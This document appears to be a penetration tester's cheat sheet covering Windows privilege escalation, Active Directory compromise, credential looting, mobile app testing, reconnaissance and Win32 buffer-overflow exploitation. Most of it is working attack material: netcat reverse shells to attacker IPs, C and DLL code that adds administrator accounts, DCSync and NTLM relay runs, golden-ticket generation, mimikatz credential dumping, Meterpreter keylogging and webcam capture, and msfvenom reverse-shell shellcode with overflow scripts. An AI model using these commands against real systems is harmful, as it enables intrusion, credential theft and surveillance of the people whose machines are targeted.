powershell -ExecutionPolicy -F -File xyz.ps1

# PS runas
# START PROCESS
$username='someUser'
$password='somePassword'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Process .\nc.exe -ArgumentList '10.10.xx.xx 4445 -e cmd.exe' -Credential $credential
# INVOKE COMMAND
$pass = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force; $Credential = New-Object System.Management.Automation.PSCredential ("fidelity\hector", $pass);Invoke-Command -Computer 'Fidelity' -ScriptBlock {C:\inetpub\wwwroot\uploads\nc.exe -e cmd 10.10.15.121 443} -credential $Credential

# Tasks
schtasks /query /fo LIST /v
file c:\WINDOWS\SchedLgU.Txt
python3 atexec.py Domain/Administrator:<Password>@123@172.21.0.0 systeminfo

# Useradd bin
#include  /* system, NULL, EXIT_FAILURE */
int main ()
{
  int i;
  i=system ("net user   /add && net localgroup administrators  /add");
  return 0;
}
# Compile
i686-w64-mingw32-gcc -o useradd.exe useradd.c

# WinXP
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.1.111 4343 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
sc config upnphost depend= ""
net start upnphost

# WinRM Port Forwarding
plink -l LOCALUSER -pw LOCALPASSWORD LOCALIP -R 5985:127.0.0.1:5985 -P 221

# DLL Injection
#include 
int owned()
{
  WinExec("cmd.exe /c net user cybervaca Password01 ; net localgroup administrators cybervaca /add", 0);
  exit(0);
  return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  owned();
  return 0;
}
# x64 compilation:
x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL main.cpp
x86_64-w64-mingw32-g++ -shared -o main.dll main.o -Wl,--out-implib,main.a

# NTLM Relay Attack
We need two tools to perform the attack, privexchange.py and ntlmrelayx. You can get both on GitHub in the PrivExchange and impacket  repositories. Start ntlmrelayx in relay mode with LDAP on a Domain Controller as  target, and supply a user under the attackers control to escalate  privileges with (in this case the ntu user):

ntlmrelayx.py -t ldap://s2016dc.testsegment.local --escalate-user ntu

Now we run the privexchange.py script:

user@localhost:~/exchpoc$ python privexchange.py -ah dev.testsegment.local s2012exc.testsegment.local -u ntu -d testsegment.local

Password: 
INFO: Using attacker URL: http://dev.testsegment.local/privexchange/
INFO: Exchange returned HTTP status 200 - authentication was OK
ERROR: The user you authenticated with does not have a mailbox associated. Try a different user.
When this is run with a user which doesn’t have a mailbox, we will get the above error. Let’s try it again with a user which does have a mailbox associated:

user@localhost:~/exchpoc$ python privexchange.py -ah dev.testsegment.local s2012exc.testsegment.local -u testuser -d testsegment.local 
Password: 
INFO: Using attacker URL: http://dev.testsegment.local/privexchange/
INFO: Exchange returned HTTP status 200 - authentication was OK
INFO: API call was successful

After a minute (which is the value supplied for the push  notification) we see the connection coming in at ntlmrelayx, which gives  our user DCSync privileges:
 We confirm the DCSync rights are in place with secretsdump: 
With all the hashed password of all Active Directory users, the  attacker can create golden tickets to impersonate any user, or use any  users password hash to authenticate to any service accepting NTLM or  Kerberos authentication in the domain.

# Generate Silver Tickets with Impacket:
python3 ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>
python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>

# Generate Golden Tickets:
python3 ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>

# Credential Access with Secretsdump
impacket-secretsdump username@target-ip -dc-ip target-ip


https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/?view=powershell-6
https://powersploit.readthedocs.io/en/latest/
https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/
https://techcommunity.microsoft.com/t5/itops-talk-blog/powershell-basics-how-to-scan-open-ports-within-a-network/ba-p/924149
https://pen-testing.sans.org/blog/2017/03/08/pen-test-poster-white-board-powershell-built-in-port-scanner/
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Portscan/

AD

# Anonymous Credential LDAP Dumping:
ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)’

# Impacket GetADUsers.py (Must have valid credentials)
GetADUsers.py -all  -dc-ip 

# Impacket lookupsid.py
/usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0

# Windapsearch:
# https://github.com/ropnop/windapsearch 
python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U

# CME
cme smb IP -u '' -p '' --users --shares

#  References: 
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise
https://github.com/infosecn1nja/AD-Attack-Defense
https://adsecurity.org/?page_id=1821 
https://github.com/sense-of-security/ADRecon
https://adsecurity.org/?p=15
https://adsecurity.org/?cat=7
https://adsecurity.org/?page_id=4031
https://www.fuzzysecurity.com/tutorials/16.html
https://blog.stealthbits.com/complete-domain-compromise-with-golden-tickets/
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain
https://adsecurity.org/?p=1588
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://www.harmj0y.net/blog/tag/powerview/
https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos

# BloodHound
# https://github.com/BloodHoundAD/BloodHound/releases
# https://github.com/BloodHoundAD/SharpHound3
# https://github.com/chryzsh/DarthSidious/blob/master/enumeration/bloodhound.md
Import-Module .\sharphound.ps1
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
Invoke-BloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password

# Rubeus
# https://github.com/GhostPack/Rubeus
## ASREProasting:
Rubeus.exe asreproast  /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
## Kerberoasting:
Rubeus.exe kerberoast /outfile:<output_TGSs_file>
Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] 
## Pass the key (PTK):
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
# Using the ticket on a Windows target: 
Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Looting

Linux

# Linux
cat /etc/passwd
cat /etc/shadow
unshadow passwd shadow > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

ifconfig
ifconfig -a
arp -a

tcpdump -i any -s0 -w capture.pcap
tcpdump -i eth0 -w capture -n -U -s 0 src not 10.11.1.111 and dst not 10.11.1.111
tcpdump -vv -i eth0 src not 10.11.1.111 and dst not 10.11.1.111

.bash_history

/var/mail
/var/spool/mail

echo $DESKTOP_SESSION
echo $XDG_CURRENT_DESKTOP
echo $GDMSESSION

Windows

hostname && whoami.exe && type proof.txt && ipconfig /all
wce32.exe -w
wce64.exe -w
fgdump.exe

# Loot passwords without tools
reg.exe save hklm\sam c:\sam_backup
reg.exe save hklm\security c:\security_backup
reg.exe save hklm\system c:\system

ipconfig /all
route print

# What other machines have been connected
arp -a

# Meterpreter
run packetrecorder -li
run packetrecorder -i 1

#Meterpreter
search -f *.txt
search -f *.zip
search -f *.doc
search -f *.xls
search -f config*
search -f *.rar
search -f *.docx
search -f *.sql
hashdump
keysscan_start
keyscan_dump
keyscan_stop
webcam_snap
load mimikatz
msv

# How to cat files in meterpreter
cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt

# Recursive search
dir /s

secretsdump.py -just-dc htb.hostname/username@10.10.1.10 > dump.txt
.\mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"

# Mimikatz
# Post exploitation commands must be executed from SYSTEM level privileges.
mimikatz # privilege::debug
mimikatz # token::whoami
mimikatz # token::elevate
mimikatz # lsadump::sam
mimikatz # sekurlsa::logonpasswords
## Pass The Hash
mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash
# Inject generated TGS key
mimikatz # kerberos::ptt <ticket_kirbi_file>
# Generating a silver ticket 
# AES 256 Key:
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
# AES 128 Key:
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
# NTLM
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
# Generating a Golden Ticket
# AES 256 Key:
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>
# AES 128 Key: 
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>
# NTLM:
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>

description: 'You know, that mini pc that you carry with you all the time'

Mobile

• General
• Android
• iOS

General

MobSF
docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest

Burp
Add proxy in Mobile WIFI settings connected to Windows Host Wifi pointing to 192.168.X.1:8080
Vbox Settings Machine -> Network -> Port Forwarding -> 8080
Burp Proxy -> Options -> Listen all interfaces

Tools
https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet
https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security

Android

# Adb
# https://developer.android.com/studio/command-line/adb?hl=es-419
adb connect IP:PORT/ID
adb devices
adb shell
adb push
adb install


# Frida
# https://github.com/frida/frida/releases
adb root
adb push /root/Downloads/frida-server-12.7.24-android-arm /data/local/tmp/. # Linux
adb push C:\Users\username\Downloads\frida-server-12.8.11-android-arm /data/local/tmp/. # Windows
adb root
adb shell "chmod 755 /data/local/tmp/frida-server && /data/local/tmp/frida-server &"
frida-ps -U # Check frida running correctly
# Run Frida script
frida -U -f com.vendor.app.version -l PATH\fridaScript.js --no-pause

# Frida resources
https://codeshare.frida.re/
https://github.com/dweinstein/awesome-frida

# Objection
# https://github.com/sensepost/objection
objection --gadget com.vendor.app.xx explore

# Install burp CA in Android API >= 24 (Nougat 7.0)
1. Export only certificate in burp as DER format
2. openssl x509 -inform DER -in cacert.der -out cacert.pem # Convert from DER to PEM
3. openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1 # Get subject_hash_old
4. mv cacert.pem [SUBJECT-HASH-OLD].0 # Rename PEM file with subject_hash_old
5. adb push [SUBJECT-HASH-OLD].0 /storage/emulated/0/ # Push to device
6. adb shell
   6.1 If you get error "Read-only file system": mount -o rw,remount /system
7. mv /storage/emulated/0/[SUBJECT-HASH-OLD].0 /system/etc/security/cacerts/
8. chmod 644 /system/etc/security/cacerts/[SUBJECT-HASH-OLD].0  
9. Reboot the device

# Analyze URLs in apk:
# https://github.com/shivsahni/APKEnum
python APKEnum.py -p ~/Downloads/app-debug.apk

# AndroPyTool:
# https://github.com/alexMyG/AndroPyTool
docker pull alexmyg/andropytool
docker run --volume=:/apks alexmyg/andropytool -s /apks/ -all

# Android Backup files (*.ab files)
( printf "\x1f\x8b\x08\x00\x00\x00\x00\x00" ; tail -c +25 backup.ab ) |  tar xfvz -

# https://github.com/viperbluff/Firebase-Extractor
# https://github.com/Turr0n/firebase
python3 firebase.py -p 4 --dnsdumpster -l file

# Jadx - decompiler
jadx-gui

# androwarn.py
# pip3 install androwarn
androwarn /root/android.apk -v 3 -r html

# androbugs.py
python androbugs.py -f /root/android.apk

# Userful apps:
# Xposed Framework
# RootCloak
# SSLUnpinning

# Check Info Stored
find /data/app -type f -exec grep --color -Hsiran "FINDTHIS" {} \;

/data/data/com.app/database/keyvalue.db
/data/data/com.app/database/sqlite
/data/app/
/data/user/0/
/storage/emulated/0/Android/data/
/storage/emulated/0/Android/obb/
/assets
/res/raw

# Check logs during app usage
https://github.com/JakeWharton/pidcat

# Download apks
https://apkpure.com

Recon:
- AndroidManifest.xml (basically a blueprint for the application)
Find exported components, api keys, custom deep link schemas, schema endpoints etc.
- resources.arsc/strings.xml
Developers are encouraged to store strings in this file instead of hard coding in application.
- res/xml/file_paths.xml
Shows file save paths.
- Search source code recursively
Especially BuildConfig files.
- Look for firebase DB:
Decompiled apk: Resources/resources.arsc/res/values/strings.xml, search for "firebsae.io" and try to access:
https://*.firebase.io/.json

API Keys:
- String references in Android Classes
getString(R.string.cmVzb3VyY2VzX3lv)
cmVzb3VyY2VzX3lv is the string resource label.
- Find these string references in strings.xml
apikeyhere
- Piece together the domains and required params in source code

Exported components:
- Activities - Entry points for application interactions of components specified in AndroidManifest.xml.
    Has several states managed by callbacks such as onCreate().
   →  Access to protected intents via exported Activities
    One exported activity that accepts a user provided intent can expose protected intents.
   → Access to sensitive data via exported Activity
    Often combined with deep links to steal data via unvalidated parameters. Write session tokens to an
    external file.
   → Access to sensitive files, stealing files, replacing imported files via exported Activities
    external-files-path, external-path
    Public app directories
- Service - Supplies additional functionality in the background.
   → Custom file upload service example that is vulnerable because android:exported="true". When exported by third party
  applications can send data to the service or steal sensitive data from applications depending on the services   function. Check if params and intent data can be set with proof of concept application.
- Broadcast receivers - Receives broadcasts from events of interest. Usually specified broadcasted intents in the broadcast receiver activity.
   → Vulnerable when receiver is exported and accepts user provided broadcasts.
- Content providers - Helps applications manage access to stored data and ways to share data with other Android applications
   → Content providers that connect to sqlite can be exploited via SQL injection by third party apps.

Deep links
- In Android, a deep link is a link that takes you directly to a specific destination within an app.
- Think of deep links as Android urls to specific parts of the application.
- Usually mirrors web application except with a different schema that navigate directory to specific Android activities.
- Verified deep links can only use http and https schemas. Sometimes developers keep custom schemas for testing new
features.
- Type of vulnerabilities are based on how the scheme://, host://, and parameters are validated
   → CSRF - Test when autoVerify=”true” is not present in AndroidManifest.xml It’s easier.
   → Open redirect - Test when custom schemes do not verify endpoint parameters or hosts
   → XSS - Test when endpoint parameters or host not validated, addJavaScriptInterface and
   → setJavascriptEnabled(true); is used.
   → LFI - Test when deep link parameters aren’t validated. appschema://app/goto?file=

iOS

# All about Jailbreak & iOS versions
https://www.theiphonewiki.com/wiki/Jailbreak

# Jailbreak for iPhone 5s though iPhone X, iOS 12.3 and up
# https://checkra.in/
checkra1n 

# 3UTools
http://www.3u.com/

# Cydia
# Liberty Bypass Antiroot

# Check Info Stored:
3U TOOLS - SSH Tunnel


find /data/app -type f -exec grep --color -Hsiran "FINDTHIS" {} \;
find /data/app -type f -exec grep --color -Hsiran "\"value\":\"" {} \;

.pslist= "value":"base64"}

find APPPATH -iname "*localstorage-wal" -> Mirar a mano

/private/var/mobile/Containers/Data/Application/{HASH}/{BundleID-3uTools-getBundelID}
/private/var/containers/Bundle/Application/{HASH}/{Nombre que hay dentro del IPA/Payloads}
/var/containers/Bundle/Application/{HASH}
/var/mobile/Containers/Data/Application/{HASH}

# IDB
https://github.com/dmayer/idb

Perfect way for Mobile App Testing

1. Static Mobile App Testing
.apk  Website/ https://mobexler.com/ (MobSF)
2. (Impact on Mobile) Genny Motion + Santoku
a. Logcat 
b. Shared preferences
c. Sqlite database 
3. Mobile with BurpSuite
4. Client Side (GUI based Testing)

Credit: 
https://mobexler.com/checklist.htm#an... 
https://github.com/MobSF/Mobile-Secur...
https://www.genymotion.com/download/
https://www.virtualbox.org/
http://demo.testfire.net/

description: Information gathering from passive and active methods

Recon

• Passive info gathering
• AIO
• Domain
• Subdomain discovering
  • Subdomain takeover
• Network scan
• Nmap
• Tcpdump
• My metholodogy

Passive/Public info gathering

# Resource
https://osintframework.com/

# Websites
rapiddns.io
dnsdumpster.com
hunter.io
pentest-tools.com
viewdns.info

# spiderfoot
spiderfoot -s domain.com

#DMARC email spoofing
# https://github.com/BishopFox/spoofcheck
python2 spoofcheck.py domain.com

# theHarvester
theHarvester -d domain.com -b all

# recon-ng
recon-ng

# Check Wayback machine
# https://github.com/tomnomnom/waybackurls
go get github.com/tomnomnom/waybackurls

https://gist.githubusercontent.com/mhmdiaa/adf6bff70142e5091792841d4b372050/raw/56366e6f58f98a1788dfec31c68f77b04513519d/waybackurls.py
https://gist.githubusercontent.com/mhmdiaa/2742c5e147d49a804b408bfed3d32d07/raw/5dd007667a5b5400521761df931098220c387551/waybackrobots.py

# Google Dorks
site:target.com -www
site:target.com intitle:"test" -support
site:target.com ext:php | ext:html
site:subdomain.target.com
site:target.com inurl:auth
site:target.com inurl:dev

# Check in GitHub for SSH keys
https://shhgit.darkport.co.uk/
https://github.com/eth0izzle/shhgit

AIO Recon tools

# https://github.com/thewhiteh4t/FinalRecon
python3 finalrecon.py --full https://example.com

# https://github.com/evyatarmeged/Raccoon
raccoon domain.com

# https://github.com/s0md3v/Photon
sudo python3 photon.py -u domain.com -l 3 -t 10 -v --wayback --keys --dns

# https://github.com/j3ssie/Osmedeus
osmedeus scan -t target.com

Domain enum

# DNSRecon
dnsrecon -d www.example.com -a 
dnsrecon -d www.example.com -t axfr
dnsrecon -d 
dnsrecon -d www.example.com -D  -t brt

# Dig
dig www.example.com + short
dig www.example.com MX
dig www.example.com NS
dig www.example.com> SOA
dig www.example.com ANY +noall +answer
dig -x www.example.com
dig -4 www.example.com (For IPv4)
dig -6 www.example.com (For IPv6)
dig www.example.com mx +noall +answer example.com ns +noall +answer
dig -t AXFR www.example.com
dig axfr @10.11.1.111 example.box

# dnsenum
dnsenum 10.11.1.111

Subdomain finder

# Best tools overall
./sub.sh -a example.com
./chomp-scan.sh -u example.com

# Other common tools
assetfinder example.com
subfinder -d example.com
knockpy domain.com
amass enum -active -d example.com
python3 domained.py -d example.com --quick

# AltDNS - Subdomains of subdomains XD
altdns -i subdomains.txt -o data_output -w words.txt -r -s results_output.txt

# Onliner to find (sub)domains related to a kword on pastebin through google
# https://github.com/gwen001/pentest-tools/blob/master/google-search.py
google-search.py -t "site:http://pastebin.com kword" -b -d -s 0 -e 5 | sed "s/\.com\//\.com\/raw\//" | xargs curl -s | egrep -ho "[a-zA-Z0-9_\.\-]+kword[a-zA-Z0-9_\.\-]+" | sort -fu

# Aquatone - Validate subdomains (take screenshots and generate report)
cat hosts.txt | aquatone

# Subdomain bruteforcing
sudo python3 subbrute.py example.com > subbrute_results.txt && massdns -r /MASSDNSPATH/lists/resolvers.txt -t A subbrute_results.txt -o S -w massdns_output.txt
gobuster -m dns -u domain.com -t 100 -w /path/dictionary.txt

# Wildcard subdomain
dig a *.domain.com = dig a asdasdasd132123123213.domain.com -> this is a wildcard subdomain

Subdomain takeover

Explanation:
1. Domain name (sub.example.com) uses a CNAME record for another domain (sub.example.com CNAME anotherdomain.com).
2. At some point, anotherdomain.com expires and is available for anyone's registration.
3. Since the CNAME record is not removed from the DNS zone of example.com, anyone who records anotherdomain.com has full control over sub.example.com until the DNS record is present.

Best resources:
https://0xpatrik.com/takeover-proofs/
https://github.com/EdOverflow/can-i-take-over-xyz
https://blog.initd.sh/others-attacks/mis-configuration/subdomain-takeover-explained/

# Subzy
https://github.com/LukaSikic/subzy
subzy -targets list.txt
subzy -concurrency 100 -hide_fails -targets subs.txt

# SubOver
# https://github.com/Ice3man543/SubOver
SubOver -l /root/subdomains.txt -t 100 # Subdomains generated with subgen

# autoSubTakeover
https://github.com/JordyZomer/autoSubTakeover
pip install autosubtakeover
autosubtakeover --wordlist domains.txt

# subjack
https://github.com/haccer/subjack
subjack -w /root/subdomain.txt -a -v -t 100 -timeout 30 -o results.txt -ssl # Subdomains generated with subgen

# subdomain-takeover
# https://github.com/antichown/subdomain-takeover
python takeover.py -d domain.com -w /root/Repos/SecLists/Discovery/DNS/clean-jhaddix-dns.txt -t 100

# subgen (subdomain list generator)
# https://github.com/pry0cc/subgen
go get -u github.com/pry0cc/subgen
cat wordlist.txt | subgen -d "uber.com"
cat /home/user/Escritorio/tools/SecLists/Discovery/DNS/clean-jhaddix-dns.txt | subgen -d domain.com |  massdns -r /usr/share/wordlists/dns.txt -t A -o S -w results.txt
Check for results.txt

Network scanning

# Netdiscover
netdiscover -i eth0
netdiscover -r 10.11.1.1/24

# Nmap
nmap -sn 10.11.1.1/24
nmap -sn 10.11.1.1-253
nmap -sn 10.11.1.*

# NetBios
nbtscan -r 10.11.1.1/24

# Linux Ping Sweep (Bash)
for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done

# Windows Ping Sweep (Run on Windows System)
for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 192.168.1.%i is up.

nmap - host scanning

# Fast simple scan
nmap 10.11.1.111

# Nmap ultra fast
nmap 10.11.1.111 --max-retries 1 --min-rate 1000

# Full complete slow scan with output
nmap -v -A -p- -Pn --script vuln -oA full 10.11.1.111

# Scan for UDP
nmap 10.11.1.111 -sU
unicornscan -mU -v -I 10.11.1.111

# Connect to udp if one is open
nc -u 10.11.1.111 48772

# Responder:
responder -I eth0 -A

tcpdump - packet scan

tcpdump -i eth0
tcpdump -c -i eth0
tcpdump -A -i eth0
tcpdump -w 0001.pcap -i eth0
tcpdump -r 0001.pcap
tcpdump -n -i eth0
tcpdump -i eth0 port 22
tcpdump -i eth0 -src 172.21.10.X
tcpdump -i eth0 -dst 172.21.10.X

My methodology

# Full subdomain enum
./sub.sh -a example.com
./chomp-scan.sh -u example.com

# Take snapshots of every subdomainy
cat subdomains.txt | aquatone -out ~/aquatone/whatever
eyewitness -file subs.txt --prepend-https

# Get unique IPs alive hosts and port scan
nmap -iL subs.txt -Pn -n -sn -oG - | awk '/Up$/{print $2}' > subs_ip_alive.txt
masscan -iL subs_alive.txt -p7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157 --max-rate 10000

# Check for every github repository
gitrob githubaccount

# Check for wayback urls and robots
waybackurls example.com
python3 waybackrobots.py
python3 waybackurls.py

# Check passwords leaks
python3 pwndb.py --target @example.com
python3 pwndb.py --target user@example.com

description: Random stuff that I consider useful

Others

• Exploiting
• Burp
• Jar usage
• Pentesting tools map

Exploiting

Basics

**Tools** 
https://github.com/apogiatzis/gdb-peda-pwndbg-gef
* gdb-peda
* gdb-gef
* pwndbg
* radare2
* ropper
* pwntools

# Web compiler
https://www.godbolt.org/

# Check protections:
checksec binary
rabin2 -I ret2win32

# Functions
rabin2 -i 

# Strings
rabin2 -z ret2win32

BOF Basic Win32

1. Send "A"*1024
2. Replace "A" with /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l LENGTH
3. When crash "!mona findmsp" (E10.11.1.111 offset) or ""/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q TEXT" or "!mona pattern_offset eip"
4. Confirm the location with "B" and "C"
5. Check for badchars instead CCCC (ESP):
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
with script _badchars.py and 
"!mona compare -a esp -f C:\Users\IEUser\Desktop\badchar_test.bin"
    5.1 AWESOME WAY TO CHECK BADCHARS (https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/):
        a. !mona config -set workingfolder c:\logs\%p
        b. !mona bytearray -b "\x00\x0d"
        c. Copy from c:\logs\%p\bytearray.txt to python exploit and run again
        d. !mona compare -f C:\logs\%p\bytearray.bin -a 02F238D0 (ESP address)
        e. In " data", before unicode chars it shows badchars.
 6. Find JMP ESP with "!mona modules" or "!mona jmp -r esp" or "!mona jmp -r esp -cpb '\x00\x0a\x0d'" find one with security modules "FALSE"

    6.1 Then, "!mona find -s "\xff\xe4" -m PROGRAM/DLL-FALSE"
    6.2 Remember put the JMP ESP location in reverse order due to endianness: 5F4A358F will be \x8f\x35\x4a\x5f


7. Generate shellcode and place it:
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.1.111 LPORT=4433 -f python –e x86/shikata_ga_nai -b "\x00"

msfvenom -p windows/shell_reverse_tcp lhost=10.11.1.111 lport=443 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -f python -v shellcode

8. Final buffer like:
buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode

##############   sample 1 ################################################
#!/usr/bin/python

import socket,sys

if len(sys.argv) != 3:
    print("usage: python fuzzer.py 10.11.1.111 PORT")
    exit(1)

payload = "A" * 1000

ipAddress = sys.argv[1]
port = int(sys.argv[2])

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ipAddress, port))
    s.recv(1024)
    print "Sending payload"
    s.send(payload)
    print "Done"
    s.close()
except:
    print "Error"
    sys.exit(0)

##############   sample 2 ################################################
#!/usr/bin/python
import time, struct, sys
import socket as so

try:
    server = sys.argv[1]
    port = 5555
except IndexError:
    print "[+] Usage %s host" % sys.argv[0]
    sys.exit()

req1 = "AUTH " + "\x41"*1072
s = so.socket(so.AF_INET, so.SOCK_STREAM)
try:
     s.connect((server, port))
     print repr(s.recv(1024))
     s.send(req1)
     print repr(s.recv(1024))
except:
     print "[!] connection refused, check debugger"
s.close()

Protections bypasses

# NX - Execution protection
- Ret2libc
https://sploitfun.wordpress.com/2015/05/08/bypassing-nx-bit-using-return-to-libc/
https://0x00sec.org/t/exploiting-techniques-000-ret2libc/1833
-ROP

# ASLR - Random library positions
- Memory leak to Ret2libc
- ROP

# Canary - Hex end buffer
https://0x00sec.org/t/exploit-mitigation-techniques-stack-canaries/5085
- Value leak
- Brute force
- Format Strings: https://owasp.org/www-community/attacks/Format_string_attack

ROP

checksec

# Listing functions imported from shared libraries is simple:          
rabin2 -i           

# Strings
rabin2 -z         

# Relocations
rabin2 -R 

# Listing just those functions written by the programmer is harder, a rough approximation could be:          
rabin2 -qs  | grep -ve imp -e ' 0 '          

RADARE2
------------------------------------------
r2 -AAA binary          # Analyze with radare2
afl                     # list functions
pdf @ funcion           # dissassemble function to check what instruction pointer want to reach
iz                      # Strings
is                      # Symbols
px 48 @ 0x00601060      # Hex dump address
dcu 0x00400809          # Breakpoint
    “press s”           # Continue over breakpoint
/R pop rdi              # Search instruction
/a pop rdi,ret          # Search

GDB
------------------------------------------
gdb-gef binary
pattern create 200
pattern search “lalal”
r                       # run
c                       # continue
s                       # step
si                      # step into
b *0x0000000000401850   # Add breakpoint
ib                      # Show breakpoints
d1                      # Remove breakpoint 1
d                       # Remove breakpoint
info functions          # Check functions
x/s 0x400c2f            # Examine address x/<(Mode)Format>  Format:s(tring)/x(hex)/i(nstruction) Mode:l/w


ROPGadget
------------------------------------------
https://github.com/JonathanSalwan/ROPgadget
ROPgadget --binary callme32 --only "mov|pop|ret"

Ropper
------------------------------------------
ropper --file callme32 --search "pop"

readelf -S binary # Check writable locations

x32
| syscall | arg0 | arg1 | arg2 | arg3 | arg4 | arg5 |
+---------+------+------+------+------+------+------+
|   %eax  | %ebx | %ecx | %edx | %esi | %edi | %ebp |

x64
| syscall | arg0 | arg1 | arg2 | arg3 | arg4 | arg5 |
+---------+------+------+------+------+------+------+
